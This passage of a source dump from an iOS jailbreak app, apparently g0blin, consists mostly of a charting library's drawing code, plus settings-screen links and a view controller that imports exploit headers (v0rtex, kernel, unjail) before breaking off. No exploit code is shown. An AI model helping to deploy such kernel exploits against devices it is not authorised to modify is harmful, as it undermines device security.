nonatomic) BOOL disableMainLine; 90 | 91 | 92 | 93 | //----- COLORS -----// 94 | 95 | /// The line color. A single, solid color which is applied to the entire line. If the \p gradient property is non-nil this property will be ignored. 96 | @property (strong, nonatomic) UIColor *color; 97 | 98 | /// The color of the area above the line, inside of its superview 99 | @property (strong, nonatomic) UIColor *topColor; 100 | 101 | /// A color gradient applied to the area above the line, inside of its superview. If set, it will be drawn on top of the fill from the \p topColor property. 102 | @property (assign, nonatomic) CGGradientRef topGradient; 103 | 104 | /// The color of the area below the line, inside of its superview 105 | @property (strong, nonatomic) UIColor *bottomColor; 106 | 107 | /// A color gradient applied to the area below the line, inside of its superview. If set, it will be drawn on top of the fill from the \p bottomColor property. 108 | @property (assign, nonatomic) CGGradientRef bottomGradient; 109 | 110 | /// A color gradient to be applied to the line. If this property is set, it will mask (override) the \p color property. 111 | @property (assign, nonatomic) CGGradientRef lineGradient; 112 | 113 | /// The drawing direction of the line gradient color 114 | @property (nonatomic) BEMLineGradientDirection lineGradientDirection; 115 | 116 | /// The reference line color. Defaults to `color`. 117 | @property (strong, nonatomic) UIColor *refrenceLineColor; 118 | 119 | 120 | 121 | //----- ALPHA -----// 122 | 123 | /// The line alpha 124 | @property (assign, nonatomic) float lineAlpha; 125 | 126 | /// The alpha value of the area above the line, inside of its superview 127 | @property (assign, nonatomic) float topAlpha; 128 | 129 | /// The alpha value of the area below the line, inside of its superview 130 | @property (assign, nonatomic) float bottomAlpha; 131 | 132 | 133 | 134 | //----- SIZE -----// 135 | 136 | /// The width of the line 137 | @property (assign, nonatomic) float lineWidth; 138 | 139 | /// The width of a reference line 140 | @property (nonatomic) float referenceLineWidth; 141 | 142 | 143 | 144 | //----- BEZIER CURVE -----// 145 | 146 | /// The line is drawn with smooth curves rather than straight lines when set to YES. 147 | @property (assign, nonatomic) BOOL bezierCurveIsEnabled; 148 | 149 | 150 | 151 | //----- ANIMATION -----// 152 | 153 | /// The entrance animation period in seconds. 154 | @property (assign, nonatomic) CGFloat animationTime; 155 | 156 | /// The type of entrance animation. 157 | @property (assign, nonatomic) BEMLineAnimation animationType; 158 | 159 | 160 | 161 | //----- AVERAGE -----// 162 | 163 | /// The average line 164 | @property (strong, nonatomic) BEMAverageLine *averageLine; 165 | 166 | /// The average line's y-value translated into the coordinate system 167 | @property (assign, nonatomic) CGFloat averageLineYCoordinate; 168 | 169 | 170 | 171 | @end 172 | -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMLine.m: -------------------------------------------------------------------------------- 1 | // 2 | // BEMLine.m 3 | // SimpleLineGraph 4 | // 5 | // Created by Bobo on 12/27/13. Updated by Sam Spencer on 1/11/14. 6 | // Copyright (c) 2013 Boris Emorine. All rights reserved. 7 | // Copyright (c) 2014 Sam Spencer. 8 | // 9 | 10 | #import "BEMLine.h" 11 | #import "BEMSimpleLineGraphView.h" 12 | 13 | #if CGFLOAT_IS_DOUBLE 14 | #define CGFloatValue doubleValue 15 | #else 16 | #define CGFloatValue floatValue 17 | #endif 18 | 19 | 20 | @interface BEMLine() 21 | 22 | @property (nonatomic, strong) NSMutableArray *points; 23 | 24 | @end 25 | 26 | @implementation BEMLine 27 | 28 | - (instancetype)initWithFrame:(CGRect)frame { 29 | self = [super initWithFrame:frame]; 30 | if (self) { 31 | // Initialization code 32 | self.backgroundColor = [UIColor clearColor]; 33 | _enableLeftReferenceFrameLine = YES; 34 | _enableBottomReferenceFrameLine = YES; 35 | _interpolateNullValues = YES; 36 | } 37 | return self; 38 | } 39 | 40 | - (void)drawRect:(CGRect)rect { 41 | //----------------------------// 42 | //---- Draw Refrence Lines ---// 43 | //----------------------------// 44 | UIBezierPath *verticalReferenceLinesPath = [UIBezierPath bezierPath]; 45 | UIBezierPath *horizontalReferenceLinesPath = [UIBezierPath bezierPath]; 46 | UIBezierPath *referenceFramePath = [UIBezierPath bezierPath]; 47 | 48 | verticalReferenceLinesPath.lineCapStyle = kCGLineCapButt; 49 | verticalReferenceLinesPath.lineWidth = 0.7; 50 | 51 | horizontalReferenceLinesPath.lineCapStyle = kCGLineCapButt; 52 | horizontalReferenceLinesPath.lineWidth = 0.7; 53 | 54 | referenceFramePath.lineCapStyle = kCGLineCapButt; 55 | referenceFramePath.lineWidth = 0.7; 56 | 57 | if (self.enableRefrenceFrame == YES) { 58 | if (self.enableBottomReferenceFrameLine) { 59 | // Bottom Line 60 | [referenceFramePath moveToPoint:CGPointMake(0, self.frame.size.height)]; 61 | [referenceFramePath addLineToPoint:CGPointMake(self.frame.size.width, self.frame.size.height)]; 62 | } 63 | 64 | if (self.enableLeftReferenceFrameLine) { 65 | // Left Line 66 | [referenceFramePath moveToPoint:CGPointMake(0+self.referenceLineWidth/4, self.frame.size.height)]; 67 | [referenceFramePath addLineToPoint:CGPointMake(0+self.referenceLineWidth/4, 0)]; 68 | } 69 | 70 | if (self.enableTopReferenceFrameLine) { 71 | // Top Line 72 | [referenceFramePath moveToPoint:CGPointMake(0+self.referenceLineWidth/4, 0)]; 73 | [referenceFramePath addLineToPoint:CGPointMake(self.frame.size.width, 0)]; 74 | } 75 | 76 | if (self.enableRightReferenceFrameLine) { 77 | // Right Line 78 | [referenceFramePath moveToPoint:CGPointMake(self.frame.size.width - self.referenceLineWidth/4, self.frame.size.height)]; 79 | [referenceFramePath addLineToPoint:CGPointMake(self.frame.size.width - self.referenceLineWidth/4, 0)]; 80 | } 81 | } 82 | 83 | if (self.enableRefrenceLines == YES) { 84 | if (self.arrayOfVerticalRefrenceLinePoints.count > 0) { 85 | for (NSNumber *xNumber in self.arrayOfVerticalRefrenceLinePoints) { 86 | CGFloat xValue; 87 | if (self.verticalReferenceHorizontalFringeNegation != 0.0) { 88 | if ([self.arrayOfVerticalRefrenceLinePoints indexOfObject:xNumber] == 0) { // far left reference line 89 | xValue = [xNumber floatValue] + self.verticalReferenceHorizontalFringeNegation; 90 | } else if ([self.arrayOfVerticalRefrenceLinePoints indexOfObject:xNumber] == [self.arrayOfVerticalRefrenceLinePoints count]-1) { // far right reference line 91 | xValue = [xNumber floatValue] - self.verticalReferenceHorizontalFringeNegation; 92 | } else xValue = [xNumber floatValue]; 93 | } else xValue = [xNumber floatValue]; 94 | 95 | CGPoint initialPoint = CGPointMake(xValue, self.frame.size.height); 96 | CGPoint finalPoint = CGPointMake(xValue, 0); 97 | 98 | [verticalReferenceLinesPath moveToPoint:initialPoint]; 99 | [verticalReferenceLinesPath addLineToPoint:finalPoint]; 100 | } 101 | } 102 | 103 | if (self.arrayOfHorizontalRefrenceLinePoints.count > 0) { 104 | for (NSNumber *yNumber in self.arrayOfHorizontalRefrenceLinePoints) { 105 | CGPoint initialPoint = CGPointMake(0, [yNumber floatValue]); 106 | CGPoint finalPoint = CGPointMake(self.frame.size.width, [yNumber floatValue]); 107 | 108 | [horizontalReferenceLinesPath moveToPoint:initialPoint]; 109 | [horizontalReferenceLinesPath addLineToPoint:finalPoint]; 110 | } 111 | } 112 | } 113 | 114 | 115 | //----------------------------// 116 | //----- Draw Average Line ----// 117 | //----------------------------// 118 | UIBezierPath *averageLinePath = [UIBezierPath bezierPath]; 119 | if (self.averageLine.enableAverageLine == YES) { 120 | averageLinePath.lineCapStyle = kCGLineCapButt; 121 | averageLinePath.lineWidth = self.averageLine.width; 122 | 123 | CGPoint initialPoint = CGPointMake(0, self.averageLineYCoordinate); 124 | CGPoint finalPoint = CGPointMake(self.frame.size.width, self.averageLineYCoordinate); 125 | 126 | [averageLinePath moveToPoint:initialPoint]; 127 | [averageLinePath addLineToPoint:finalPoint]; 128 | } 129 | 130 | 131 | //----------------------------// 132 | //------ Draw Graph Line -----// 133 | //----------------------------// 134 | // LINE 135 | UIBezierPath *line = [UIBezierPath bezierPath]; 136 | UIBezierPath *fillTop; 137 | UIBezierPath *fillBottom; 138 | 139 | CGFloat xIndexScale = self.frame.size.width/([self.arrayOfPoints count] - 1); 140 | 141 | self.points = [NSMutableArray arrayWithCapacity:self.arrayOfPoints.count]; 142 | for (int i = 0; i < self.arrayOfPoints.count; i++) { 143 | CGPoint value = CGPointMake(xIndexScale * i, [self.arrayOfPoints[i] CGFloatValue]); 144 | if (value.y != BEMNullGraphValue || !self.interpolateNullValues) { 145 | [self.points addObject:[NSValue valueWithCGPoint:value]]; 146 | } 147 | } 148 | 149 | BOOL bezierStatus = self.bezierCurveIsEnabled; 150 | if (self.arrayOfPoints.count <= 2 && self.bezierCurveIsEnabled == YES) bezierStatus = NO; 151 | 152 | if (!self.disableMainLine && bezierStatus) { 153 | line = [BEMLine quadCurvedPathWithPoints:self.points]; 154 | fillBottom = [BEMLine quadCurvedPathWithPoints:self.bottomPointsArray]; 155 | fillTop = [BEMLine quadCurvedPathWithPoints:self.topPointsArray]; 156 | } else if (!self.disableMainLine && !bezierStatus) { 157 | line = [BEMLine linesToPoints:self.points]; 158 | fillBottom = [BEMLine linesToPoints:self.bottomPointsArray]; 159 | fillTop = [BEMLine linesToPoints:self.topPointsArray]; 160 | } else { 161 | fillBottom = [BEMLine linesToPoints:self.bottomPointsArray]; 162 | fillTop = [BEMLine linesToPoints:self.topPointsArray]; 163 | } 164 | 165 | //----------------------------// 166 | //----- Draw Fill Colors -----// 167 | //----------------------------// 168 | [self.topColor set]; 169 | [fillTop fillWithBlendMode:kCGBlendModeNormal alpha:self.topAlpha]; 170 | 171 | [self.bottomColor set]; 172 | [fillBottom fillWithBlendMode:kCGBlendModeNormal alpha:self.bottomAlpha]; 173 | 174 | CGContextRef ctx = UIGraphicsGetCurrentContext(); 175 | if (self.topGradient != nil) { 176 | CGContextSaveGState(ctx); 177 | CGContextAddPath(ctx, [fillTop CGPath]); 178 | CGContextClip(ctx); 179 | CGContextDrawLinearGradient(ctx, self.topGradient, CGPointZero, CGPointMake(0, CGRectGetMaxY(fillTop.bounds)), 0); 180 | CGContextRestoreGState(ctx); 181 | } 182 | 183 | if (self.bottomGradient != nil) { 184 | CGContextSaveGState(ctx); 185 | CGContextAddPath(ctx, [fillBottom CGPath]); 186 | CGContextClip(ctx); 187 | CGContextDrawLinearGradient(ctx, self.bottomGradient, CGPointZero, CGPointMake(0, CGRectGetMaxY(fillBottom.bounds)), 0); 188 | CGContextRestoreGState(ctx); 189 | } 190 | 191 | 192 | //----------------------------// 193 | //------ Animate Drawing -----// 194 | //----------------------------// 195 | if (self.enableRefrenceLines == YES) { 196 | CAShapeLayer *verticalReferenceLinesPathLayer = [CAShapeLayer layer]; 197 | verticalReferenceLinesPathLayer.frame = self.bounds; 198 | verticalReferenceLinesPathLayer.path = verticalReferenceLinesPath.CGPath; 199 | verticalReferenceLinesPathLayer.opacity = self.lineAlpha == 0 ? 0.1 : self.lineAlpha/2; 200 | verticalReferenceLinesPathLayer.fillColor = nil; 201 | verticalReferenceLinesPathLayer.lineWidth = self.referenceLineWidth/2; 202 | 203 | if (self.lineDashPatternForReferenceYAxisLines) { 204 | verticalReferenceLinesPathLayer.lineDashPattern = self.lineDashPatternForReferenceYAxisLines; 205 | } 206 | 207 | if (self.refrenceLineColor) { 208 | verticalReferenceLinesPathLayer.strokeColor = self.refrenceLineColor.CGColor; 209 | } else { 210 | verticalReferenceLinesPathLayer.strokeColor = self.color.CGColor; 211 | } 212 | 213 | if (self.animationTime > 0) 214 | [self animateForLayer:verticalReferenceLinesPathLayer withAnimationType:self.animationType isAnimatingReferenceLine:YES]; 215 | [self.layer addSublayer:verticalReferenceLinesPathLayer]; 216 | 217 | 218 | CAShapeLayer *horizontalReferenceLinesPathLayer = [CAShapeLayer layer]; 219 | horizontalReferenceLinesPathLayer.frame = self.bounds; 220 | horizontalReferenceLinesPathLayer.path = horizontalReferenceLinesPath.CGPath; 221 | horizontalReferenceLinesPathLayer.opacity = self.lineAlpha == 0 ? 0.1 : self.lineAlpha/2; 222 | horizontalReferenceLinesPathLayer.fillColor = nil; 223 | horizontalReferenceLinesPathLayer.lineWidth = self.referenceLineWidth/2; 224 | if(self.lineDashPatternForReferenceXAxisLines) { 225 | horizontalReferenceLinesPathLayer.lineDashPattern = self.lineDashPatternForReferenceXAxisLines; 226 | } 227 | 228 | if (self.refrenceLineColor) { 229 | horizontalReferenceLinesPathLayer.strokeColor = self.refrenceLineColor.CGColor; 230 | } else { 231 | horizontalReferenceLinesPathLayer.strokeColor = self.color.CGColor; 232 | } 233 | 234 | if (self.animationTime > 0) 235 | [self animateForLayer:horizontalReferenceLinesPathLayer withAnimationType:self.animationType isAnimatingReferenceLine:YES]; 236 | [self.layer addSublayer:horizontalReferenceLinesPathLayer]; 237 | } 238 | 239 | CAShapeLayer *referenceLinesPathLayer = [CAShapeLayer layer]; 240 | referenceLinesPathLayer.frame = self.bounds; 241 | referenceLinesPathLayer.path = referenceFramePath.CGPath; 242 | referenceLinesPathLayer.opacity = self.lineAlpha == 0 ? 0.1 : self.lineAlpha/2; 243 | referenceLinesPathLayer.fillColor = nil; 244 | referenceLinesPathLayer.lineWidth = self.referenceLineWidth/2; 245 | 246 | if (self.refrenceLineColor) referenceLinesPathLayer.strokeColor = self.refrenceLineColor.CGColor; 247 | else referenceLinesPathLayer.strokeColor = self.color.CGColor; 248 | 249 | if (self.animationTime > 0) 250 | [self animateForLayer:referenceLinesPathLayer withAnimationType:self.animationType isAnimatingReferenceLine:YES]; 251 | [self.layer addSublayer:referenceLinesPathLayer]; 252 | 253 | if (self.disableMainLine == NO) { 254 | CAShapeLayer *pathLayer = [CAShapeLayer layer]; 255 | pathLayer.frame = self.bounds; 256 | pathLayer.path = line.CGPath; 257 | pathLayer.strokeColor = self.color.CGColor; 258 | pathLayer.fillColor = nil; 259 | pathLayer.opacity = self.lineAlpha; 260 | pathLayer.lineWidth = self.lineWidth; 261 | pathLayer.lineJoin = kCALineJoinBevel; 262 | pathLayer.lineCap = kCALineCapRound; 263 | if (self.animationTime > 0) [self animateForLayer:pathLayer withAnimationType:self.animationType isAnimatingReferenceLine:NO]; 264 | if (self.lineGradient) [self.layer addSublayer:[self backgroundGradientLayerForLayer:pathLayer]]; 265 | else [self.layer addSublayer:pathLayer]; 266 | } 267 | 268 | if (self.averageLine.enableAverageLine == YES) { 269 | CAShapeLayer *averageLinePathLayer = [CAShapeLayer layer]; 270 | averageLinePathLayer.frame = self.bounds; 271 | averageLinePathLayer.path = averageLinePath.CGPath; 272 | averageLinePathLayer.opacity = self.averageLine.alpha; 273 | averageLinePathLayer.fillColor = nil; 274 | averageLinePathLayer.lineWidth = self.averageLine.width; 275 | 276 | if (self.averageLine.dashPattern) averageLinePathLayer.lineDashPattern = self.averageLine.dashPattern; 277 | 278 | if (self.averageLine.color) averageLinePathLayer.strokeColor = self.averageLine.color.CGColor; 279 | else averageLinePathLayer.strokeColor = self.color.CGColor; 280 | 281 | if (self.animationTime > 0) 282 | [self animateForLayer:averageLinePathLayer withAnimationType:self.animationType isAnimatingReferenceLine:NO]; 283 | [self.layer addSublayer:averageLinePathLayer]; 284 | } 285 | } 286 | 287 | - (NSArray *)topPointsArray { 288 | CGPoint topPointZero = CGPointMake(0,0); 289 | CGPoint topPointFull = CGPointMake(self.frame.size.width, 0); 290 | NSMutableArray *topPoints = [NSMutableArray arrayWithArray:self.points]; 291 | [topPoints insertObject:[NSValue valueWithCGPoint:topPointZero] atIndex:0]; 292 | [topPoints addObject:[NSValue valueWithCGPoint:topPointFull]]; 293 | return topPoints; 294 | } 295 | 296 | - (NSArray *)bottomPointsArray { 297 | CGPoint bottomPointZero = CGPointMake(0, self.frame.size.height); 298 | CGPoint bottomPointFull = CGPointMake(self.frame.size.width, self.frame.size.height); 299 | NSMutableArray *bottomPoints = [NSMutableArray arrayWithArray:self.points]; 300 | [bottomPoints insertObject:[NSValue valueWithCGPoint:bottomPointZero] atIndex:0]; 301 | [bottomPoints addObject:[NSValue valueWithCGPoint:bottomPointFull]]; 302 | return bottomPoints; 303 | } 304 | 305 | + (UIBezierPath *)linesToPoints:(NSArray *)points { 306 | UIBezierPath *path = [UIBezierPath bezierPath]; 307 | NSValue *value = points[0]; 308 | CGPoint p1 = [value CGPointValue]; 309 | [path moveToPoint:p1]; 310 | 311 | for (NSUInteger i = 1; i < points.count; i++) { 312 | value = points[i]; 313 | CGPoint p2 = [value CGPointValue]; 314 | [path addLineToPoint:p2]; 315 | } 316 | return path; 317 | } 318 | 319 | + (UIBezierPath *)quadCurvedPathWithPoints:(NSArray *)points { 320 | UIBezierPath *path = [UIBezierPath bezierPath]; 321 | 322 | NSValue *value = points[0]; 323 | CGPoint p1 = [value CGPointValue]; 324 | [path moveToPoint:p1]; 325 | 326 | if (points.count == 2) { 327 | value = points[1]; 328 | CGPoint p2 = [value CGPointValue]; 329 | [path addLineToPoint:p2]; 330 | return path; 331 | } 332 | 333 | for (NSUInteger i = 1; i < points.count; i++) { 334 | value = points[i]; 335 | CGPoint p2 = [value CGPointValue]; 336 | 337 | CGPoint midPoint = midPointForPoints(p1, p2); 338 | [path addQuadCurveToPoint:midPoint controlPoint:controlPointForPoints(midPoint, p1)]; 339 | [path addQuadCurveToPoint:p2 controlPoint:controlPointForPoints(midPoint, p2)]; 340 | 341 | p1 = p2; 342 | } 343 | return path; 344 | } 345 | 346 | static CGPoint midPointForPoints(CGPoint p1, CGPoint p2) { 347 | return CGPointMake((p1.x + p2.x) / 2, (p1.y + p2.y) / 2); 348 | } 349 | 350 | static CGPoint controlPointForPoints(CGPoint p1, CGPoint p2) { 351 | CGPoint controlPoint = midPointForPoints(p1, p2); 352 | CGFloat diffY = fabs(p2.y - controlPoint.y); 353 | 354 | if (p1.y < p2.y) 355 | controlPoint.y += diffY; 356 | else if (p1.y > p2.y) 357 | controlPoint.y -= diffY; 358 | 359 | return controlPoint; 360 | } 361 | 362 | - (void)animateForLayer:(CAShapeLayer *)shapeLayer withAnimationType:(BEMLineAnimation)animationType isAnimatingReferenceLine:(BOOL)shouldHalfOpacity { 363 | if (animationType == BEMLineAnimationNone) return; 364 | else if (animationType == BEMLineAnimationFade) { 365 | CABasicAnimation *pathAnimation = [CABasicAnimation animationWithKeyPath:@"opacity"]; 366 | pathAnimation.duration = self.animationTime; 367 | pathAnimation.fromValue = [NSNumber numberWithFloat:0.0f]; 368 | if (shouldHalfOpacity == YES) pathAnimation.toValue = [NSNumber numberWithFloat:self.lineAlpha == 0 ? 0.1 : self.lineAlpha/2]; 369 | else pathAnimation.toValue = [NSNumber numberWithFloat:self.lineAlpha]; 370 | [shapeLayer addAnimation:pathAnimation forKey:@"opacity"]; 371 | 372 | return; 373 | } else if (animationType == BEMLineAnimationExpand) { 374 | CABasicAnimation *pathAnimation = [CABasicAnimation animationWithKeyPath:@"lineWidth"]; 375 | pathAnimation.duration = self.animationTime; 376 | pathAnimation.fromValue = [NSNumber numberWithFloat:0.0f]; 377 | pathAnimation.toValue = [NSNumber numberWithFloat:shapeLayer.lineWidth]; 378 | [shapeLayer addAnimation:pathAnimation forKey:@"lineWidth"]; 379 | 380 | return; 381 | } else { 382 | CABasicAnimation *pathAnimation = [CABasicAnimation animationWithKeyPath:@"strokeEnd"]; 383 | pathAnimation.duration = self.animationTime; 384 | pathAnimation.fromValue = [NSNumber numberWithFloat:0.0f]; 385 | pathAnimation.toValue = [NSNumber numberWithFloat:1.0f]; 386 | [shapeLayer addAnimation:pathAnimation forKey:@"strokeEnd"]; 387 | 388 | return; 389 | } 390 | } 391 | 392 | - (CALayer *)backgroundGradientLayerForLayer:(CAShapeLayer *)shapeLayer { 393 | UIGraphicsBeginImageContext(self.bounds.size); 394 | CGContextRef imageCtx = UIGraphicsGetCurrentContext(); 395 | CGPoint start, end; 396 | if (self.lineGradientDirection == BEMLineGradientDirectionHorizontal) { 397 | start = CGPointMake(0, CGRectGetMidY(shapeLayer.bounds)); 398 | end = CGPointMake(CGRectGetMaxX(shapeLayer.bounds), CGRectGetMidY(shapeLayer.bounds)); 399 | } else { 400 | start = CGPointMake(CGRectGetMidX(shapeLayer.bounds), 0); 401 | end = CGPointMake(CGRectGetMidX(shapeLayer.bounds), CGRectGetMaxY(shapeLayer.bounds)); 402 | } 403 | 404 | CGContextDrawLinearGradient(imageCtx, self.lineGradient, start, end, 0); 405 | UIImage *image = UIGraphicsGetImageFromCurrentImageContext(); 406 | UIGraphicsEndImageContext(); 407 | CALayer *gradientLayer = [CALayer layer]; 408 | gradientLayer.frame = self.bounds; 409 | gradientLayer.contents = (id)image.CGImage; 410 | gradientLayer.mask = shapeLayer; 411 | return gradientLayer; 412 | } 413 | 414 | @end 415 | -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMPermanentPopupView.h: -------------------------------------------------------------------------------- 1 | // 2 | // BEMPermanentPopupView.h 3 | // SimpleLineGraph 4 | // 5 | // Created by Delisa Mason on 1/29/15. 6 | // Copyright (c) 2015 Boris Emorine. All rights reserved. 7 | // 8 | 9 | @import UIKit; 10 | 11 | 12 | @interface BEMPermanentPopupView : UIView 13 | 14 | @end 15 | 16 | @interface BEMPermanentPopupLabel : UILabel 17 | 18 | @end 19 | -------------------------------------------------------------------------------- /g0blin/BEMSimpleLineGraph/BEMPermanentPopupView.m: -------------------------------------------------------------------------------- 1 | // 2 | // BEMPermanentPopupView.m 3 | // SimpleLineGraph 4 | // 5 | // Created by Delisa Mason on 1/29/15. 6 | // Copyright (c) 2015 Boris Emorine. All rights reserved. 7 | // 8 | 9 | #import "BEMPermanentPopupView.h" 10 | 11 | @implementation BEMPermanentPopupView 12 | 13 | @end 14 | 15 | @implementation BEMPermanentPopupLabel 16 | 17 | @end 18 | -------------------------------------------------------------------------------- /g0blin/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /g0blin/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | Menlo-Bold 15 | Menlo-Regular 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 34 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 62 | 63 | 64 | 65 | 66 | 67 | 74 | 81 | 88 | 95 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 159 | 174 | 181 | 192 | 203 | 214 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | -------------------------------------------------------------------------------- /g0blin/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UIRequiresFullScreen 32 | 33 | UIStatusBarStyle 34 | UIStatusBarStyleLightContent 35 | UISupportedInterfaceOrientations 36 | 37 | UIInterfaceOrientationPortrait 38 | 39 | UISupportedInterfaceOrientations~ipad 40 | 41 | UIInterfaceOrientationPortrait 42 | 43 | UIViewControllerBasedStatusBarAppearance 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /g0blin/SettingsController.h: -------------------------------------------------------------------------------- 1 | // 2 | // SettingsController.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-30. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface SettingsController : UIViewController 12 | 13 | @property (weak, nonatomic) IBOutlet UISwitch *reinstallBootstrapSwitch; 14 | 15 | @end 16 | -------------------------------------------------------------------------------- /g0blin/SettingsController.m: -------------------------------------------------------------------------------- 1 | // 2 | // SettingsController.m 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-30. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "SettingsController.h" 10 | 11 | @interface SettingsController () 12 | @property (weak, nonatomic) IBOutlet UIButton *redditButton; 13 | @property (weak, nonatomic) IBOutlet UIButton *discordButton; 14 | @property (weak, nonatomic) IBOutlet UIButton *issuesButton; 15 | @property (weak, nonatomic) IBOutlet UIScrollView *scrollView; 16 | @property (weak, nonatomic) IBOutlet UIView *contentView; 17 | @end 18 | 19 | @implementation SettingsController 20 | 21 | - (void)viewDidLoad { 22 | [super viewDidLoad]; 23 | // Do any additional setup after loading the view. 24 | 25 | self.redditButton.layer.cornerRadius = 16; 26 | self.discordButton.layer.cornerRadius = 16; 27 | self.issuesButton.layer.cornerRadius = 16; 28 | 29 | self.scrollView.contentSize = CGSizeMake(self.scrollView.bounds.size.width, self.contentView.frame.size.height); 30 | 31 | [self.reinstallBootstrapSwitch setOn:NO animated:NO]; 32 | } 33 | 34 | - (void)viewWillAppear:(BOOL)animated { 35 | [super viewWillAppear:animated]; 36 | self.scrollView.contentOffset = CGPointMake(0, 0); 37 | } 38 | 39 | - (IBAction)goIssues:(UIButton *)sender { 40 | NSURL *url = [NSURL URLWithString:@"http://github.com/sticktron/g0blin/issues"]; 41 | [[UIApplication sharedApplication] openURL:url options:@{} completionHandler:nil]; 42 | } 43 | 44 | - (IBAction)goReddit:(UIButton *)sender { 45 | NSURL *url = [NSURL URLWithString:@"http://reddit.com/r/jailbreak"]; 46 | [[UIApplication sharedApplication] openURL:url options:@{} completionHandler:nil]; 47 | } 48 | 49 | - (IBAction)goDiscord:(UIButton *)sender { 50 | NSURL *url = [NSURL URLWithString:@"http://discord.gg/RZqpUfR"]; 51 | [[UIApplication sharedApplication] openURL:url options:@{} completionHandler:nil]; 52 | } 53 | 54 | - (void)didReceiveMemoryWarning { 55 | [super didReceiveMemoryWarning]; 56 | // Dispose of any resources that can be recreated. 57 | } 58 | 59 | /* 60 | #pragma mark - Navigation 61 | 62 | // In a storyboard-based application, you will often want to do a little preparation before navigation 63 | - (void)prepareForSegue:(UIStoryboardSegue *)segue sender:(id)sender { 64 | // Get the new view controller using [segue destinationViewController]. 65 | // Pass the selected object to the new view controller. 66 | } 67 | */ 68 | 69 | @end 70 | -------------------------------------------------------------------------------- /g0blin/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | @end 13 | -------------------------------------------------------------------------------- /g0blin/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | #import "SettingsController.h" 11 | #import "v0rtex.h" 12 | #import "common.h" 13 | #import "offsets.h" 14 | #import "kernel.h" 15 | #import "unjail.h" 16 | #import "remount.h" 17 | #import "bootstrap.h" 18 | #include 19 | #import "BEMSimpleLineGraphView.h" 20 | #import 21 | #import 22 | 23 | 24 | #define RTM_IFINFO2 0x12 //from route.h 25 | 26 | #define GRAPE [UIColor colorWithRed:0.5 green:0 blue:1 alpha:1] 27 | #define STRAWBERRY [UIColor colorWithRed:1 green:0 blue:0.5 alpha:1] 28 | 29 | #define LEAD [UIColor colorWithRed:0.13 green:0.13 blue:0.13 alpha:1] 30 | 31 | #define UPDATE_INTERVAL 2.0f 32 | 33 | #define GRAPH_MAX_POINTS 30 34 | 35 | 36 | typedef struct { 37 | uint64_t totalSystemTime; 38 | uint64_t totalUserTime; 39 | uint64_t totalIdleTime; 40 | } CPUSample; 41 | 42 | 43 | extern int (*gsystem)(const char *); 44 | 45 | 46 | @interface ViewController () 47 | @property (weak, nonatomic) IBOutlet UIImageView *logoView; 48 | @property (weak, nonatomic) IBOutlet UIButton *settingsButton; 49 | @property (weak, nonatomic) IBOutlet UIButton *goButton; 50 | @property (weak, nonatomic) IBOutlet UITextView *consoleView; 51 | @property (weak, nonatomic) IBOutlet UILabel *cpuMeterLabel; 52 | @property (weak, nonatomic) IBOutlet UILabel *ramMeterLabel; 53 | @property (weak, nonatomic) IBOutlet UIView *cpuGraphContainer; 54 | 55 | @property (nonatomic, assign) BOOL jailbroken; 56 | @property (nonatomic, assign) BOOL fun; 57 | @property (nonatomic, assign) BOOL needsReboot; 58 | @property (nonatomic, strong) AVPlayerViewController 